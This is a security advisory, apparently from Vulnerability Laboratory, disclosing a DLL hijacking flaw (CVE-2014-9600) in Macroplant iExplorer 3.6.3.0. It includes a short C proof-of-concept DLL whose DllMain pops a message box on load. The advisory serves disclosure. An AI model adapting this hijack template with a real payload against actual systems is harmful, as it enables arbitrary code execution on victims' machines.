Lucene search

K
vulnerlabHadji Samir [email protected]VULNERABLE:1415
HistoryJan 19, 2015 - 12:00 a.m.

iExplorer 3.6.3 - DLL Hijacking Exploit itunesmobiledevice.dll

2015-01-1900:00:00
Hadji Samir [email protected]
www.vulnerability-lab.com
21

7.2 High

CVSS2

Attack Vector

LOCAL

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.0004 Low

EPSS

Percentile

5.1%

Document Title:
===============
iExplorer 3.6.3 - DLL Hijacking Exploit itunesmobiledevice.dll


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1415

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9600

CVE-ID:
=======
CVE-2014-9600


Release Date:
=============
2015-01-19


Vulnerability Laboratory ID (VL-ID):
====================================
1415


Common Vulnerability Scoring System:
====================================
8


Product & Service Introduction:
===============================
iExplorer lets you easily transfer music from any iPhone, iPod or iPad to a Mac or PC computer and iTunes. You can search for 
and preview particular songs then copy them to iTunes with the touch of a button or with drag and drop. Looking to transfer 
more than just a few tracks? With one click, iExplorer lets you instantly rebuild entire playlists or use the Auto Transfer 
feature and copy everything from your device to iTunes.

(Copy of the Vendor Homepage: http://www.macroplant.com/iexplorer/ )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory Researcher discovered a local vulnerability in the  official Macroplant iExplorer v3.6.3.0 software.


Vulnerability Disclosure Timeline:
==================================
2015-01-19:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Macroplant
Product: iExplorer 3.6.3.0


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
Macroplant iExplorer could allow a remote attacker to execute arbitrary code on the system. The application does not directly specify the fully 
qualified path to a dynamic-linked library (itunesmobiledevice.dll) when running on Microsoft Windows. By persuading a victim to open a 
specially-crafted file from a WebDAV or SMB share using a vulnerable application, a remote attacker could exploit this vulnerability via a 
specially-crafted library to execute arbitrary code on the system.


Proof of Concept (PoC):
=======================
/* 
* Exploit Title: iExplorer 3.6.3.0  DLL Hijacking Exploit (itunesmobiledevice.dll)
* Author: Hadji Samir [[email protected]]
* Vendor Homepage: http://www.macroplant.com/
* Soft link :http://www.macroplant.com/downloads
* Tested on: Windows 7 FR

*/

#include <windows.h> 

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
  {
  case DLL_PROCESS_ATTACH:
    owned();
  case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
  break;
  }
  return TRUE;
}

int owned() {
  MessageBox(0, "iExplorer DLL Hijacked\Hadji Samir", "POC", MB_OK);
}


Security Risk:
==============
The security risk of the local software vulnerability is estimated as medium. (CVSS 8.0)


Credits & Authors:
==================
Hadji Samir [email protected]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    [email protected] 	- [email protected] 	       		- [email protected]
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
([email protected] or [email protected]) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



7.2 High

CVSS2

Attack Vector

LOCAL

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.0004 Low

EPSS

Percentile

5.1%

Related for VULNERABLE:1415